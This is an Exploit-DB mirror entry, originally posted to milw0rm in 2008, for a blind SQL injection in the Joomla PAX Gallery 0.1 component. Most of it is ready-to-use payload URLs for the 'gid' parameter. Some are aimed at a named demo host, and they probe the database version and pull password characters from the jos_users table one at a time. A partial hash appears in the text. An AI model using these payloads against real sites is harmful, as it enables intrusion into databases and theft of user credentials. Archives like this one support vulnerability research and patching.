exploit-db-mirror/exploits/php/webapps/7587.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

36 lines
No EOL
1,014 B
Text

[â– ] Joomla Component PAX Gallery v 0.1 (gid) <= Blind SQL Injection Vulnerability
>---------------------------------------<
> AuToR: XaDoS (SecurityCode Team)
> Contact M&: xados [at] hotmail [dot] it
> B§g: Blind $ql inJection
> Note: safe mode = ON
> Autor script: Tobias Floery
>---------------------------------------<
[â– ] ExPL0iT:
|: http://www.example.com/path/com_paxgallery&task=table&gid=[$qL]
[■] D£M0:
>Version:
|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=5 [Ye$]
|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=4 [Noo]
|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20ascii(substring((select%20password%20from%20jos_users%20limit%201,1),1,1))%3E100
d8e423..ecc... ;-)
[â– ] Th4nKs::
\> Str0ke </ \> Securitycode Team </ \> StaKer </
# milw0rm.com [2008-12-28]